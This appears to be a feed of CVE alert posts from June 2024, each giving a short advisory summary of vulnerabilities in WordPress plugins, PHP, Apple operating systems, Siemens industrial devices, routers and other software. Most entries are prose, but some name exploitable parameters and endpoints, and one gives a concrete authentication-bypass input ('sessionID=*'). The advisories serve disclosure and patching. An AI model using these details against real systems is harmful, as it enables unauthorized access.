🚨 CVE-2024-4892The BuddyPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘display_name’ parameter in versions up to, and including, 12.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-12 02:37:55 |
🚨 CVE-2024-2408The openssl_private_decrypt function in PHP, when using PKCS1 padding (OPENSSL_PKCS1_PADDING, which is the default), is vulnerable to the Marvin Attack unless it is used with an OpenSSL version that includes the changes from this pull request: https://github.com/openssl/openssl/pull/13817 (rsa_pkcs1_implicit_rejection). These changes are part of OpenSSL 3.2 and have also been backported to stable versions of various Linux distributions, as well as to the PHP builds provided for Windows since the previous release. All distributors and builders should ensure that this version is used to prevent PHP from being vulnerable.PHP Windows builds for the versions 8.1.29, 8.2.20 and 8.3.8 and above include OpenSSL patches that fix the vulnerability.🎖@cveNotify |
|
| 2024-06-12 02:37:54 |
🚨 CVE-2024-5458In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, due to a code logic error, filtering functions such as filter_var when validating URLs (FILTER_VALIDATE_URL) for certain types of URLs the function will result in invalid user information (username + password part of URLs) being treated as valid user information. This may lead to the downstream code accepting invalid URLs as valid and parsing them incorrectly.🎖@cveNotify |
|
| 2024-06-12 02:37:50 |
🚨 CVE-2024-1874In PHP versions 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, when using proc_open() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell.🎖@cveNotify |
|
| 2024-06-12 02:37:49 |
🚨 CVE-2024-28180Package jose aims to provide an implementation of the Javascript Object Signing and Encryption set of standards. An attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size (whichever is larger). This vulnerability has been patched in versions 4.0.1, 3.0.3 and 2.6.3.🎖@cveNotify |
|
| 2024-06-12 02:37:48 |
🚨 CVE-2012-1823sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.🎖@cveNotify |
|
| 2024-06-12 01:37:37 |
🚨 CVE-2024-4315parisneo/lollms version 9.5 is vulnerable to Local File Inclusion (LFI) attacks due to insufficient path sanitization. The `sanitize_path_from_endpoint` function fails to properly sanitize Windows-style paths (backward slash `\`), allowing attackers to perform directory traversal attacks on Windows systems. This vulnerability can be exploited through various routes, including `personalities` and `/del_preset`, to read or delete any file on the Windows filesystem, compromising the system's availability.🎖@cveNotify |
|
| 2024-06-12 01:37:34 |
🚨 CVE-2024-36103OS command injection vulnerability in WRC-X5400GS-B v1.0.10 and earlier, and WRC-X5400GSA-B v1.0.10 and earlier allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product.🎖@cveNotify |
|
| 2024-06-12 01:37:33 |
🚨 CVE-2024-25568OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent unauthenticated attacker to execute arbitrary OS commands by sending a specially crafted request to the product. Affected products and versions are as follows: WRC-X3200GST3-B v1.25 and earlier, WRC-G01-W v1.24 and earlier, and WMC-X1800GST-B v1.41 and earlier. Note that WMC-X1800GST-B is also included in e-Mesh Starter Kit "WMC-2LX-B".🎖@cveNotify |
|
| 2024-06-12 01:37:32 |
🚨 CVE-2024-21798ELECOM wireless LAN routers contain a cross-site scripting vulnerability. Assume that a malicious administrative user configures the affected product with specially crafted content. When another administrative user logs in and operates the product, an arbitrary script may be executed on the web browser. Note that WMC-X1800GST-B is also included in e-Mesh Starter Kit "WMC-2LX-B".🎖@cveNotify |
|
| 2024-06-11 21:37:24 |
🚨 CVE-2018-15660An issue was discovered in the Ola Money (aka com.olacabs.olamoney) application 1.9.0 for Android. If an attacker controls an application with accessibility permissions, then the attacker can read certain Ola Money data such as a credit card number, expiration date, bank account number, and transaction history. NOTE: the vendor does not agree that this is a security issue requiring a fix🎖@cveNotify |
|
| 2024-06-11 20:37:24 |
🚨 CVE-2023-4727A flaw was found in dogtag-pki and pki-core. The token authentication scheme can be bypassed with a Ldap injection. By passing the query string parameter sessionID=*, an attacker can authenticate with an existing session saved in the Ldap directory server, which may lead to an escalation of privilege.🎖@cveNotify |
|
| 2024-06-11 19:37:42 |
🚨 CVE-2024-36702libiec61850 v1.5 was discovered to contain a heap overflow via the BerEncoder_encodeLength function at /asn1/ber_encoder.c.🎖@cveNotify |
|
| 2024-06-11 19:37:41 |
🚨 CVE-2024-35213An improper input validation vulnerability in the SGI Image Codec of QNX SDP version(s) 6.6, 7.0, and 7.1 could allow an attacker to potentially cause a denial-of-service condition or execute code in the context of the image processing process.🎖@cveNotify |
|
| 2024-06-11 19:37:38 |
🚨 CVE-2024-34406Improper exception handling in McAfee Security: Antivirus VPN for Android before 8.3.0 could allow an attacker to cause a denial of service through the use of a malformed deep link.🎖@cveNotify |
|
| 2024-06-11 19:37:37 |
🚨 CVE-2024-28024A vulnerability exists in the FOXMAN-UN/UNEM in which sensitive information is stored in cleartext within a resource that might be accessible to an other control sphere.🎖@cveNotify |
|
| 2024-06-11 19:37:36 |
🚨 CVE-2024-28020A user/password reuse vulnerability exists in the FOXMAN-UN/UNEM application and server management. If exploited a malicious user could use the passwords and login information to extend access on the server and other services.🎖@cveNotify |
|
| 2024-06-11 19:37:32 |
🚨 CVE-2023-51380An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be read with an improperly scoped token. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1.🎖@cveNotify |
|
| 2024-06-11 19:37:31 |
🚨 CVE-2019-12105In Supervisor through 4.0.2, an unauthenticated user can read log files or restart a service. Note: The maintainer responded that the affected component, inet_http_server, is not enabled by default but if the user enables it and does not set a password, Supervisor logs a warning message. The maintainer indicated the ability to run an open server will not be removed but an additional warning was added to the documentation🎖@cveNotify |
|
| 2024-06-11 19:37:30 |
🚨 CVE-2019-14352In Joget Workflow 6.0.20, CSV Injection, also known as Formula Injection, exists, as demonstrated by jw/web/userview/crm_community/crm_userview_sales/_/account_new with the Account ID or Account Name field. NOTE: the vendor disputes the relevance of this finding because CSV is not the intended export format for spreadsheet applications🎖@cveNotify |
|
| 2024-06-11 19:37:26 |
🚨 CVE-2018-12446An issue was discovered in the com.dropbox.android application 98.2.2 for Android. The Passcode feature allows authentication bypass via runtime manipulation that forces a certain method's return value to true. In other words, an attacker could authenticate with an arbitrary passcode. NOTE: the vendor indicates that this is not an attack of interest within the context of their threat model, which excludes Android devices on which rooting has occurred🎖@cveNotify |
|
| 2024-06-11 19:37:25 |
🚨 CVE-2018-8754The libevt_record_values_read_event() function in libevt_record_values.c in libevt before 2018-03-17 does not properly check for out-of-bounds values of user SID data size, strings size, or data size. NOTE: the vendor has disputed this as described in libyal/libevt issue 5 on GitHub🎖@cveNotify |
|
| 2024-06-11 19:37:24 |
🚨 CVE-2018-5278In Malwarebytes Premium 3.3.1.2183, the driver file (FARFLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9c40e00c. NOTE: the vendor reported that they "have not been able to reproduce the issue on any Windows operating system version (32-bit or 64-bit).🎖@cveNotify |
|
| 2024-06-11 18:37:25 |
🚨 CVE-2018-18405jQuery v2.2.2 allows XSS via a crafted onerror attribute of an IMG element. NOTE: this vulnerability has been reported to be spam entry🎖@cveNotify |
|
| 2024-06-11 18:37:24 |
🚨 CVE-2020-10110Citrix Gateway 11.1, 12.0, and 12.1 allows Information Exposure Through Caching. NOTE: Citrix disputes this as not a vulnerability. There is no sensitive information disclosure through the cache headers on Citrix ADC. The "Via" header lists cache protocols and recipients between the start and end points for a request or a response. The "Age" header provides the age of the cached response in seconds. Both headers are commonly used for proxy cache and the information is not sensitive🎖@cveNotify |
|
| 2024-06-11 18:07:48 |
🚨 CVE-2024-5645The Envo Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘button_css_id’ parameter within the Button widget in all versions up to, and including, 1.8.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-11 18:07:47 |
🚨 CVE-2024-4703The One Page Express Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's one_page_express_contact_form shortcode in all versions up to, and including, 1.6.37 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-11 18:07:46 |
🚨 CVE-2024-4489The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘custom_upload_mimes’ function in versions up to, and including, 1.3.976 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-11 18:07:42 |
🚨 CVE-2024-5188The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'get_manual_calendar_events' function in all versions up to, and including, 5.9.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-11 18:07:41 |
🚨 CVE-2024-5259The MultiVendorX Marketplace – WooCommerce MultiVendor Marketplace Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘hover_animation’ parameter in all versions up to, and including, 4.1.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-11 18:07:37 |
🚨 CVE-2024-5221The Qi Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's file uploader in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-11 18:07:36 |
🚨 CVE-2024-28995SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.🎖@cveNotify |
|
| 2024-06-11 18:07:35 |
🚨 CVE-2024-5665The Login/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ‘export_settings’ function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read arbitrary options on affected sites.🎖@cveNotify |
|
| 2024-06-11 18:07:32 |
🚨 CVE-2024-4177A host whitelist parser issue in the proxy service implemented in the GravityZone Update Server allows an attacker to cause a server-side request forgery. This issue only affects GravityZone Console versions before 6.38.1-2 that are running only on premise.🎖@cveNotify |
|
| 2024-06-11 18:07:31 |
🚨 CVE-2024-5656The Google CSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-06-11 18:07:30 |
🚨 CVE-2024-34363Envoy is a cloud-native, open source edge and service proxy. Due to how Envoy invoked the nlohmann JSON library, the library could throw an uncaught exception from downstream data if incomplete UTF-8 strings were serialized. The uncaught exception would cause Envoy to crash.🎖@cveNotify |
|
| 2024-06-11 17:07:36 |
🚨 CVE-2024-4084A Server-Side Request Forgery (SSRF) vulnerability exists in the latest version of mintplex-labs/anything-llm, allowing attackers to bypass the official fix intended to restrict access to intranet IP addresses and protocols. Despite efforts to filter out intranet IP addresses starting with 192, 172, 10, and 127 through regular expressions and limit access protocols to HTTP and HTTPS, attackers can still bypass these restrictions using alternative representations of IP addresses and accessing other ports running on localhost. This vulnerability enables attackers to access any asset on the internal network, attack web services on the internal network, scan hosts on the internal network, and potentially access AWS metadata endpoints. The vulnerability is due to insufficient validation of user-supplied URLs, which can be exploited to perform SSRF attacks.🎖@cveNotify |
|
| 2024-06-11 17:07:35 |
🚨 CVE-2024-36675LyLme_spage v1.9.5 is vulnerable to Server-Side Request Forgery (SSRF) via the get_head function.🎖@cveNotify |
|
| 2024-06-11 17:07:31 |
🚨 CVE-2022-28658Apport argument parsing mishandles filename splitting on older kernels resulting in argument spoofing🎖@cveNotify |
|
| 2024-06-11 17:07:30 |
🚨 CVE-2022-28655is_closing_session() allows users to create arbitrary tcp dbus connections🎖@cveNotify |
|
| 2024-06-11 17:07:26 |
🚨 CVE-2022-28652~/.config/apport/settings parsing is vulnerable to "billion laughs" attack🎖@cveNotify |
|
| 2024-06-11 17:07:25 |
🚨 CVE-2024-4219Prior to 23.2, it is possible to perform arbitrary Server-Side requests via HTTP-based connectors within BeyondInsight, resulting in a server-side request forgery vulnerability.🎖@cveNotify |
|
| 2024-06-11 17:07:24 |
🚨 CVE-2024-4520An improper access control vulnerability exists in the gaizhenbiao/chuanhuchatgpt application, specifically in version 20240410. This vulnerability allows any user on the server to access the chat history of any other user without requiring any form of interaction between the users. Exploitation of this vulnerability could lead to data breaches, including the exposure of sensitive personal details, financial data, or confidential conversations. Additionally, it could facilitate identity theft and manipulation or fraud through the unauthorized access to users' chat histories. This issue is due to insufficient access control mechanisms in the application's handling of chat history data.🎖@cveNotify |
|
| 2024-06-11 16:37:46 |
🚨 CVE-2024-29987Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-06-11 16:37:45 |
🚨 CVE-2024-26247Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-06-11 16:37:44 |
🚨 CVE-2024-26246Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-06-11 16:37:40 |
🚨 CVE-2024-26181Windows Kernel Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-06-11 15:37:48 |
🚨 CVE-2020-21468A segmentation fault in the redis-server component of Redis 5.0.7 leads to a denial of service (DOS). NOTE: the vendor cannot reproduce this issue in a released version, such as 5.0.7🎖@cveNotify |
|
| 2024-06-11 15:37:47 |
🚨 CVE-2019-25038Unbound before 1.9.5 allows an integer overflow in a size calculation in dnscrypt/dnscrypt.c. NOTE: The vendor disputes that this is a vulnerability. Although the code may be vulnerable, a running Unbound installation cannot be remotely or locally exploited🎖@cveNotify |
|
| 2024-06-11 15:37:46 |
🚨 CVE-2021-3349GNOME Evolution through 3.38.3 produces a "Valid signature" message for an unknown identifier on a previously trusted key because Evolution does not retrieve enough information from the GnuPG API. NOTE: third parties dispute the significance of this issue, and dispute whether Evolution is the best place to change this behavior🎖@cveNotify |
|
| 2024-06-11 15:07:25 |
🚨 CVE-2024-30484Missing Authorization vulnerability in RT Easy Builder – Advanced addons for Elementor.This issue affects RT Easy Builder – Advanced addons for Elementor: from n/a through 2.0.🎖@cveNotify |
|
| 2024-06-11 14:38:20 |
🚨 CVE-2024-5189The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘custom_js’ parameter in all versions up to, and including, 5.9.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-11 14:38:19 |
🚨 CVE-2024-35671Missing Authorization vulnerability in Minoji MJ Update History.This issue affects MJ Update History: from n/a through 1.0.4.🎖@cveNotify |
|
| 2024-06-11 14:38:18 |
🚨 CVE-2024-34442Missing Authorization vulnerability in weDevs weDocs.This issue affects weDocs: from n/a through 2.1.4.🎖@cveNotify |
|
| 2024-06-11 14:38:14 |
🚨 CVE-2024-2012vulnerability exists in the FOXMAN-UN/UNEM server / API Gateway that if exploited an attacker could use to allow unintended commands or code to be executed on the UNEM server allowing sensitive data to be read or modified or could cause other unintended behavior🎖@cveNotify |
|
| 2024-06-11 14:38:13 |
🚨 CVE-2024-2011A heap-based buffer overflow vulnerability exists in the FOXMAN-UN/UNEM thatif exploited will generally lead to a denial of service but can be used to execute arbitrary code, which is usually outside the scope of aprogram's implicit security policy🎖@cveNotify |
|
| 2024-06-11 14:38:12 |
🚨 CVE-2024-28023A vulnerability exists in the message queueing mechanism that if exploited can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive infor mation or even execute arbitrary code.🎖@cveNotify |
|
| 2024-06-11 14:38:11 |
🚨 CVE-2024-28021A vulnerability exists in the FOXMAN-UN/UNEM server that affects the message queueing mechanism’s certificate validation. If exploited an at tacker could spoof a trusted entity causing a loss of confidentiality and integrity.🎖@cveNotify |
|
| 2024-06-11 14:38:07 |
🚨 CVE-2024-5829A vulnerability classified as problematic was found in smallweigit Avue up to 3.4.4. Affected by this vulnerability is an unknown functionality of the component avueUeditor. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-267895. NOTE: The code maintainer explains, that "rich text is no longer maintained".🎖@cveNotify |
|
| 2024-06-11 14:38:06 |
🚨 CVE-2024-36858An arbitrary file upload vulnerability in the /v1/app/writeFileSync interface of Jan v0.4.12 allows attackers to execute arbitrary code via uploading a crafted file.🎖@cveNotify |
|
| 2024-06-11 14:38:05 |
🚨 CVE-2024-36857Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.🎖@cveNotify |
|
| 2024-06-11 14:38:01 |
🚨 CVE-2024-35672Missing Authorization vulnerability in Netgsm.This issue affects Netgsm: from n/a through 2.9.16.🎖@cveNotify |
|
| 2024-06-11 14:38:00 |
🚨 CVE-2024-34759Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in VideoWhisper Picture Gallery allows Stored XSS.This issue affects Picture Gallery: from n/a through 1.5.11.🎖@cveNotify |
|
| 2024-06-11 14:37:59 |
🚨 CVE-2024-25095Insertion of Sensitive Information into Log File vulnerability in Code Parrots Easy Forms for Mailchimp.This issue affects Easy Forms for Mailchimp: from n/a through 6.9.0.🎖@cveNotify |
|
| 2024-06-11 14:08:03 |
🚨 CVE-2024-27831An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. Processing a file may lead to unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2024-06-11 14:08:02 |
🚨 CVE-2024-27830This issue was addressed through improved state management. This issue is fixed in tvOS 17.5, visionOS 1.2, Safari 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-06-11 14:08:01 |
🚨 CVE-2024-27828The issue was addressed with improved memory handling. This issue is fixed in visionOS 1.2, watchOS 10.5, tvOS 17.5, iOS 17.5 and iPadOS 17.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-06-11 14:08:00 |
🚨 CVE-2024-27819The issue was addressed by restricting options offered on a locked device. This issue is fixed in iOS 17.5 and iPadOS 17.5. An attacker with physical access may be able to access contacts from the lock screen.🎖@cveNotify |
|
| 2024-06-11 14:07:55 |
🚨 CVE-2024-27815An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-06-11 14:07:54 |
🚨 CVE-2024-27812The issue was addressed with improvements to the file handling protocol. This issue is fixed in visionOS 1.2. Processing web content may lead to a denial-of-service.🎖@cveNotify |
|
| 2024-06-11 14:07:53 |
🚨 CVE-2024-27811The issue was addressed with improved checks. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to elevate privileges.🎖@cveNotify |
|
| 2024-06-11 14:07:48 |
🚨 CVE-2024-27807The issue was addressed with improved checks. This issue is fixed in iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. An app may be able to circumvent App Privacy Report logging.🎖@cveNotify |
|
| 2024-06-11 14:07:47 |
🚨 CVE-2024-27806This issue was addressed with improved environment sanitization. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-06-11 14:07:46 |
🚨 CVE-2024-27802An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8, tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2024-06-11 14:07:42 |
🚨 CVE-2024-27801The issue was addressed with improved checks. This issue is fixed in tvOS 17.5, visionOS 1.2, iOS 17.5 and iPadOS 17.5, watchOS 10.5, macOS Sonoma 14.5. An app may be able to elevate privileges.🎖@cveNotify |
|
| 2024-06-11 14:07:41 |
🚨 CVE-2024-27799This issue was addressed with additional entitlement checks. This issue is fixed in macOS Sonoma 14.5, macOS Ventura 13.6.7, macOS Monterey 12.7.5, iOS 16.7.8 and iPadOS 16.7.8. An unprivileged app may be able to log keystrokes in other apps including those using secure input mode.🎖@cveNotify |
|
| 2024-06-11 14:07:40 |
🚨 CVE-2024-23282The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. A maliciously crafted email may be able to initiate FaceTime calls without user authorization.🎖@cveNotify |
|
| 2024-06-11 14:07:39 |
🚨 CVE-2024-23251An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. An attacker with physical access may be able to leak Mail account credentials.🎖@cveNotify |
|
| 2024-06-11 11:37:30 |
🚨 CVE-2024-5829A vulnerability classified as problematic was found in smallweigit Avue up to 3.4.4. Affected by this vulnerability is an unknown functionality of the component avueUeditor. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-267895. NOTE: The code maintainer explains, that "rich text is no longer maintained".🎖@cveNotify |
|
| 2024-06-11 11:37:26 |
🚨 CVE-2024-34813Missing Authorization vulnerability in MoreConvert MC Woocommerce Wishlist.This issue affects MC Woocommerce Wishlist: from n/a through 1.7.8.🎖@cveNotify |
|
| 2024-06-11 11:37:25 |
🚨 CVE-2024-34690SAP Student Life CycleManagement (SLcM) fails to conduct proper authorization checks forauthenticated users, leading to the potential escalation of privileges. Onsuccessful exploitation it could allow an attacker to access and editnon-sensitive report variants that are typically restricted, causing minimalimpact on the confidentiality and integrity of the application.🎖@cveNotify |
|
| 2024-06-11 11:37:24 |
🚨 CVE-2024-34688Due to unrestricted access to the Meta ModelRepository services in SAP NetWeaver AS Java, attackers can perform DoS attackson the application, which may prevent legitimate users from accessing it. Thiscan result in no impact on confidentiality and integrity but a high impact onthe availability of the application.🎖@cveNotify |
|
| 2024-06-11 09:37:33 |
🚨 CVE-2022-25622A vulnerability has been identified in SIMATIC CFU DIQ (6ES7655-5PX31-1XX0), SIMATIC CFU PA (6ES7655-5PX11-0XX0), SIMATIC ET 200AL IM 157-1 PN (6ES7157-1AB00-0AB0), SIMATIC ET 200pro IM154-8 PN/DP CPU (6ES7154-8AB01-0AB0), SIMATIC ET 200pro IM154-8F PN/DP CPU (6ES7154-8FB01-0AB0), SIMATIC ET 200pro IM154-8FX PN/DP CPU (6ES7154-8FX00-0AB0), SIMATIC ET 200S IM151-8 PN/DP CPU (6ES7151-8AB01-0AB0), SIMATIC ET 200S IM151-8F PN/DP CPU (6ES7151-8FB01-0AB0), SIMATIC ET200ecoPN, AI 8xRTD/TC, M12-L (6ES7144-6JF00-0BB0), SIMATIC ET200ecoPN, CM 4x IO-Link, M12-L (6ES7148-6JE00-0BB0), SIMATIC ET200ecoPN, CM 8x IO-Link, M12-L (6ES7148-6JG00-0BB0), SIMATIC ET200ecoPN, CM 8x IO-Link, M12-L (6ES7148-6JJ00-0BB0), SIMATIC ET200ecoPN, DI 16x24VDC, M12-L (6ES7141-6BH00-0BB0), SIMATIC ET200ecoPN, DI 8x24VDC, M12-L (6ES7141-6BG00-0BB0), SIMATIC ET200ecoPN, DIQ 16x24VDC/2A, M12-L (6ES7143-6BH00-0BB0), SIMATIC ET200ecoPN, DQ 8x24VDC/0,5A, M12-L (6ES7142-6BG00-0BB0), SIMATIC ET200ecoPN, DQ 8x24VDC/2A, M12-L (6ES7142-6BR00-0BB0), SIMATIC ET200MP IM155-5 PN HF (incl. SIPLUS variants), SIMATIC ET200SP IM155-6 MF HF, SIMATIC ET200SP IM155-6 PN HA (incl. SIPLUS variants), SIMATIC ET200SP IM155-6 PN HF (incl. SIPLUS variants), SIMATIC ET200SP IM155-6 PN/2 HF (incl. SIPLUS variants), SIMATIC ET200SP IM155-6 PN/3 HF (incl. SIPLUS variants), SIMATIC PN/MF Coupler (6ES7158-3MU10-0XA0), SIMATIC PN/PN Coupler (6ES7158-3AD10-0XA0), SIMATIC S7-1500 CPU family (incl. related ET200 CPUs and SIPLUS variants), SIMATIC S7-300 CPU 314C-2 PN/DP (6ES7314-6EH04-0AB0), SIMATIC S7-300 CPU 315-2 PN/DP (6ES7315-2EH14-0AB0), SIMATIC S7-300 CPU 315F-2 PN/DP (6ES7315-2FJ14-0AB0), SIMATIC S7-300 CPU 315T-3 PN/DP (6ES7315-7TJ10-0AB0), SIMATIC S7-300 CPU 317-2 PN/DP (6ES7317-2EK14-0AB0), SIMATIC S7-300 CPU 317F-2 PN/DP (6ES7317-2FK14-0AB0), SIMATIC S7-300 CPU 317T-3 PN/DP (6ES7317-7TK10-0AB0), SIMATIC S7-300 CPU 317TF-3 PN/DP (6ES7317-7UL10-0AB0), SIMATIC S7-300 CPU 319-3 PN/DP (6ES7318-3EL01-0AB0), SIMATIC S7-300 CPU 319F-3 PN/DP (6ES7318-3FL01-0AB0), SIMATIC S7-400 CPU 412-2 PN V7 (6ES7412-2EK07-0AB0), SIMATIC S7-400 CPU 414-3 PN/DP V7 (6ES7414-3EM07-0AB0), SIMATIC S7-400 CPU 414F-3 PN/DP V7 (6ES7414-3FM07-0AB0), SIMATIC S7-400 CPU 416-3 PN/DP V7 (6ES7416-3ES07-0AB0), SIMATIC S7-400 CPU 416F-3 PN/DP V7 (6ES7416-3FS07-0AB0), SIMATIC S7-400 H V6 CPU family (incl. SIPLUS variants), SIMATIC S7-410 V10 CPU family (incl. SIPLUS variants), SIMATIC S7-410 V8 CPU family (incl. SIPLUS variants), SIMATIC TDC CP51M1, SIMATIC TDC CPU555, SIMATIC WinAC RTX 2010 (6ES7671-0RC08-0YA0), SIMATIC WinAC RTX F 2010 (6ES7671-1RC08-0YA0), SINAMICS DCM, SINAMICS G110M, SINAMICS G115D, SINAMICS G120 (incl. SIPLUS variants), SINAMICS G130, SINAMICS G150, SINAMICS S110, SINAMICS S120 (incl. SIPLUS variants), SINAMICS S150, SINAMICS S210 (6SL5...), SINAMICS V90, SIPLUS ET 200S IM151-8 PN/DP CPU (6AG1151-8AB01-7AB0), SIPLUS ET 200S IM151-8F PN/DP CPU (6AG1151-8FB01-2AB0), SIPLUS HCS4200 CIM4210 (6BK1942-1AA00-0AA0), SIPLUS HCS4200 CIM4210C (6BK1942-1AA00-0AA1), SIPLUS HCS4300 CIM4310 (6BK1943-1AA00-0AA0), SIPLUS NET PN/PN Coupler (6AG2158-3AD10-4XA0), SIPLUS S7-300 CPU 314C-2 PN/DP (6AG1314-6EH04-7AB0), SIPLUS S7-300 CPU 315-2 PN/DP (6AG1315-2EH14-7AB0), SIPLUS S7-300 CPU 315F-2 PN/DP (6AG1315-2FJ14-2AB0), SIPLUS S7-300 CPU 317-2 PN/DP (6AG1317-2EK14-7AB0), SIPLUS S7-300 CPU 317F-2 PN/DP (6AG1317-2FK14-2AB0), SIPLUS S7-400 CPU 414-3 PN/DP V7 (6AG1414-3EM07-7AB0), SIPLUS S7-400 CPU 416-3 PN/DP V7 (6AG1416-3ES07-7AB0). The PROFINET (PNIO) stack, when integrated with the Interniche IP stack, improperly handles internal resources for TCP segments where the minimum TCP-Header length is less than defined.This could allow an attacker to create a denial of service condition for TCP services on affected devices by sending specially crafted TCP segments.🎖@cveNotify |
|
| 2024-06-11 09:37:32 |
🚨 CVE-2020-28400Affected devices contain a vulnerability that allows an unauthenticated attacker to trigger a denial-of-service condition. The vulnerability can be triggered if a large amount of DCP reset packets are sent to the device.🎖@cveNotify |
|
| 2024-06-11 08:37:44 |
